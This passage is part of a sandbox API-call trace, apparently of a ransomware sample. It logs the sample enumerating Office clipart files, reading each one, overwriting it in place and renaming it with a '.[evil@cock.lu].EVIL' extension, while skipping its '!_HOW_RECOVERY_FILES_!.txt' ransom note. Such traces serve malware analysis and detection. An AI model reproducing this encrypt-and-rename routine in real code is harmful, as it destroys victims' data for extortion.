Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf.[evil@cock.lu].evil")) returned 1 [0171.703] ??_V@YAXPEAX@Z () returned 0x1 [0171.705] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF", dwFileAttributes=0x200) returned 0 [0171.706] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.706] wcsstr (_Str="SPACE_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.706] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 69 [0171.706] wcscmp (_String1="SPACE_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.706] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SPACE_01.MID") returned 0x0 [0171.706] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 0x45 [0171.706] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\space_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.708] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x107b, lpOverlapped=0x0) returned 1 [0171.714] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.714] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.715] _errno () returned 0x84b1160840 [0171.715] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.715] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1080, lpOverlapped=0x0) returned 1 [0171.715] CloseHandle (hObject=0x1a8) returned 1 [0171.715] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.715] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.715] __uncaught_exception () returned 0x84b1160800 [0171.715] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.715] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\space_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\space_01.mid.[evil@cock.lu].evil")) returned 1 [0171.723] ??_V@YAXPEAX@Z () returned 0x1 [0171.726] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPACE_01.MID", dwFileAttributes=0x200) returned 0 [0171.726] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.726] wcsstr (_Str="SPRNG_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.726] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 69 [0171.726] wcscmp (_String1="SPRNG_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.726] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SPRNG_01.MID") returned 0x0 [0171.726] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 0x45 [0171.726] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sprng_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.728] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a2c, lpOverlapped=0x0) returned 1 [0171.736] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.736] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.736] _errno () returned 0x84b1160840 [0171.737] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.737] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a40, lpOverlapped=0x0) returned 1 [0171.737] CloseHandle (hObject=0x1a8) returned 1 [0171.737] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.737] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.737] __uncaught_exception () returned 0x84b1160800 [0171.737] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.737] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sprng_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sprng_01.mid.[evil@cock.lu].evil")) returned 1 [0171.738] ??_V@YAXPEAX@Z () returned 0x1 [0171.741] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SPRNG_01.MID", dwFileAttributes=0x200) returned 0 [0171.741] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.741] wcsstr (_Str="STUBBY1.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.741] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF") returned 68 [0171.741] wcscmp (_String1="STUBBY1.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.741] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="STUBBY1.WMF") returned 0x0 [0171.741] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF") returned 0x44 [0171.741] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.744] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbd6, lpOverlapped=0x0) returned 1 [0171.751] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.751] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.751] _errno () returned 0x84b1160840 [0171.751] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.751] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0171.751] CloseHandle (hObject=0x1a8) returned 1 [0171.752] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.752] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.752] __uncaught_exception () returned 0x84b1160800 [0171.752] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.752] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby1.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby1.wmf.[evil@cock.lu].evil")) returned 1 [0171.753] ??_V@YAXPEAX@Z () returned 0x1 [0171.756] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY1.WMF", dwFileAttributes=0x200) returned 0 [0171.756] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.756] wcsstr (_Str="STUBBY2.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.756] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF") returned 68 [0171.756] wcscmp (_String1="STUBBY2.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.756] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="STUBBY2.WMF") returned 0x0 [0171.756] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF") returned 0x44 [0171.756] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.758] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa16, lpOverlapped=0x0) returned 1 [0171.765] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.765] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.765] _errno () returned 0x84b1160840 [0171.765] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.765] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa20, lpOverlapped=0x0) returned 1 [0171.765] CloseHandle (hObject=0x1a8) returned 1 [0171.766] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.766] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.766] __uncaught_exception () returned 0x84b1160800 [0171.766] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.766] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby2.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\stubby2.wmf.[evil@cock.lu].evil")) returned 1 [0171.767] ??_V@YAXPEAX@Z () returned 0x1 [0171.770] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\STUBBY2.WMF", dwFileAttributes=0x200) returned 0 [0171.770] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.770] wcsstr (_Str="SUMER_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.770] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 69 [0171.770] wcscmp (_String1="SUMER_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.770] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SUMER_01.MID") returned 0x0 [0171.770] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 0x45 [0171.770] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.772] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x36dc, lpOverlapped=0x0) returned 1 [0171.781] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.781] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.782] _errno () returned 0x84b1160840 [0171.782] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.782] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x36e0, lpOverlapped=0x0) returned 1 [0171.782] CloseHandle (hObject=0x1a8) returned 1 [0171.782] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.782] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.782] __uncaught_exception () returned 0x84b1160800 [0171.782] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.782] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sumer_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sumer_01.mid.[evil@cock.lu].evil")) returned 1 [0171.783] ??_V@YAXPEAX@Z () returned 0x1 [0171.786] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SUMER_01.MID", dwFileAttributes=0x200) returned 0 [0171.786] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.786] wcsstr (_Str="SWEST_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.786] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 69 [0171.786] wcscmp (_String1="SWEST_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.786] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SWEST_01.MID") returned 0x0 [0171.786] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 0x45 [0171.786] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.788] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2135, lpOverlapped=0x0) returned 1 [0171.790] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.790] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.790] _errno () returned 0x84b1160840 [0171.791] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.791] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2140, lpOverlapped=0x0) returned 1 [0171.791] CloseHandle (hObject=0x1a8) returned 1 [0171.791] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.791] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.791] __uncaught_exception () returned 0x84b1160800 [0171.791] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.791] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\swest_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\swest_01.mid.[evil@cock.lu].evil")) returned 1 [0171.792] ??_V@YAXPEAX@Z () returned 0x1 [0171.795] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SWEST_01.MID", dwFileAttributes=0x200) returned 0 [0171.795] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.795] wcsstr (_Str="SY00110_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.795] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF") returned 69 [0171.795] wcscmp (_String1="SY00110_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.795] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SY00110_.WMF") returned 0x0 [0171.795] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF") returned 0x45 [0171.795] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00110_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.797] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4f0, lpOverlapped=0x0) returned 1 [0171.802] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.802] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.802] _errno () returned 0x84b1160840 [0171.802] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.802] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x500, lpOverlapped=0x0) returned 1 [0171.802] CloseHandle (hObject=0x1a8) returned 1 [0171.803] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.803] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.803] __uncaught_exception () returned 0x84b1160800 [0171.803] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.803] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00110_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00110_.wmf.[evil@cock.lu].evil")) returned 1 [0171.804] ??_V@YAXPEAX@Z () returned 0x1 [0171.806] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00110_.WMF", dwFileAttributes=0x200) returned 0 [0171.807] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.807] wcsstr (_Str="SY00127_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.807] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF") returned 69 [0171.807] wcscmp (_String1="SY00127_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.807] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SY00127_.WMF") returned 0x0 [0171.807] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF") returned 0x45 [0171.807] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00127_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.808] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1844, lpOverlapped=0x0) returned 1 [0171.816] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.816] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.816] _errno () returned 0x84b1160840 [0171.816] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.816] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1860, lpOverlapped=0x0) returned 1 [0171.817] CloseHandle (hObject=0x1a8) returned 1 [0171.817] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.817] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.817] __uncaught_exception () returned 0x84b1160800 [0171.817] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.817] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00127_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY00127_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy00127_.wmf.[evil@cock.lu].evil")) returned 1 [0171.818] 